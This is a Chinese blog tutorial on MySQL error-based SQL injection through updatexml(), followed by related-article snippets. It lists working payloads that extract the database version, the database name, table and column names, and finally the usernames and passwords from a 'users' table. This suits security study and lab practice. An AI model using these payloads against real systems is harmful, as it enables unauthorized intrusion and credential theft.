SQL注入----报错注入简介(updatexml)

已于 2023-05-16 15:12:28 修改
阅读量3.5k 收藏 12
点赞数 2
分类专栏: # SQL注入 文章标签: sql 数据库 mysql
于 2022-06-21 11:21:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z526209693/article/details/125387258
版权

Updatexml()函数“updatexml(XML_document,XPath_string,new_value);”
即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”。

XML_documentString格式,为XML文档对象的名称,

DocXPath_stringXpath格式的字符串

new_valueString格式,替换查找到的符合条件的数据


报错注入原理:concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出用户

0x7eASCII码,实为~,upadtexml()报错信息为特殊字符、字母及之后的内容,为了前面字母丢失,开头连接一个特殊字符~。

常见报错注入语句

查询到数据库版本
and (updatexml(1,concat(0x7e,(select version()),0x7e),1))

查询当前数据库
and (updatexml(1,concat(0x7e,(selectdatabase()),0x7e),1))

获取当前数据库表名结构
and (updatexml(1,concat(0x7e (select(select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))

查询该表的字段
and (updatexml(1,concat(0x7e,(select(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')),0x7e),1))

查询字段中的内容
and (updatexml(1,concat(0x7e,(select(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))

 

 

0xc4Sec
关注
专栏目录
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1315
改变文档中符合条件的节点,使用不同的 XML 标记匹配和替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段和 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
sql注入-报错注入
课嗨教育的专栏
04-29 806
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 1.什么是报错注入 mysql_error 2.我们在什么情况下使用报错注入 在页面返回连错错误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返回:1' LIMIT 0,1 htt...
SQL注入原理-报错盲注
T1ngSh0w的博客
09-14 945
SQL注入-报错盲注(updatexml()函数与extractvalue()函数)
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
updatexml报错注入
最新发布
q1314q520q的博客
08-12 566
updatexml报错注入的使用。
SQL报错注入updatexml
2301_78549931的博客
08-05 1216
第一个参数:XML的内容第二个参数:是需要update的位置XPATH路径第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
sqli-labs】Less 5——报错注入updatexml()函数)
用博客做做记录的小白
06-23 2289
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入,注入类型为单引号字符型。
SQL注入——UpdateXml报错注入
heyingcheng的博客
03-07 458
正常句式:select updatexml(doc,'/book/author/surname','1') from xml;错误句式:select updatexml(doc,'~book/author/surname','1') from xml;第一个参数:XML_document是string格式,为XML文档对象的名称,例如Doc。第三个参数:new_value,string格式,替换查找到的符合条件的数据。第二个参数:XPath_string是路径,XPath格式的字符串。
SQL注入updatexml报错注入(函数解释)
m0_74608722的博客
06-05 808
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
SQL注入--报错和盲注
qq_57307348的博客
02-10 1938
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 盲注 布尔型盲注 基于时间盲注sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
SQL注入之错误注入_基于updatexml()的脱库原理
wangyuxiang946的博客
06-21 1万+
updatexml()的基本用法、报错原理及脱库步骤
报错注入分析之updatexml注入
aiquan9342的博客
01-02 589
PS:今天元旦,家里打来电话说,今年春节要回老家。心里倍感恐惧。可以清楚的感觉得到父母说话的气息没有底气。大概如同我一样是恐惧吧。加油吧!努力赚钱! 先丢一篇很不错的文章:http://www.moonsec.com/post-299.html UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_docum...
updatexml函数-报错注入原理学习
热门推荐
身高两米不到的博客
03-17 1万+
注入之前,首先得明白updatexml函数的利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
SQL注入实战之报错注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1469
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
sql盲注_updateXml报错注入
sugar_by的博客
06-03 514
函数updatexml(XML_document,XPath_string,new_value)包含三个参数 第一个参数是string格式,为XML文档对象名称,例如doc 第二个参数是路径 第三个参数是替换查找符合条件的数据 updatexml报错原理 同extractvalue()一样sql盲注_extractvalue报错注入 输入错误第二个参数,即更改路径的符号 正常语句 错误语句 利用updatexml()报错注入 判断字符型/数据型 判断闭合方式 可以判断为双引号闭合 查看有多少列 查询数据
SQL注入漏洞 | updatexml报错注入
weixin_52116519的博客
12-09 1095
XMLXML 被设计用来传输和存储数据,是各种应用程序之间进行数据传输的最常用的工具。xpathXPath 是一门在 XML 文档中查找信息的语言。XPath 使用路径表达式来选取 XML 文档中的节点或者节点集。这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似。语法格式第一个参数:XML_document是String格式,为XML文档对象的名称第二个参数:XPath_string ,代表路径,Xpath格式的字符串,例如。
sqli-labs less-17 updatexml()报错注入
cuddlylm的博客
04-02 1742
这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框 首先阅读源码发现 该题先审查user name的值,只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.
sqli-labs-报错注入-updatexml报错
weixin_51706044的博客
03-14 1409
文章目录前言一、updatexml报错二、updatexml报错记忆 前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错 今天我在这里先记录一下对于updatexml报错函数的学习 一、updatexml报错 基本格式: ?id=
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml(target_xml, xpath_expr, new_value) ``` 其中,target_xml 是待修改的 XML 数据,xpath_expr 是 XPath 表达式,new_value 是新的值。 在进行 SQL 注入攻击时,攻击者可以构造恶意的 xpath_expr 参数,使得 MySQL 数据库返回错误的信息,从而获取敏感信息。 具体实现方法可以参考以下示例: ``` SELECT updatexml(null,concat(0x7e,(SELECT user()),0x7e),null); ``` 在这个例子中,攻击者使用 concat 函数将波浪符号(0x7e)和当前用户的信息拼接成字符串,并作为 xpath_expr 参数传递给 updatexml 函数。由于这个参数不合法,MySQL 数据库会返回错误信息,其中包含了当前用户的信息。攻击者就可以从错误信息中获取敏感信息。 为了防止这种攻击,应该对用户输入进行严格的过滤和验证,避免恶意的输入。同时,也可以通过限制 MySQL 用户的权限来降低攻击的风险。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值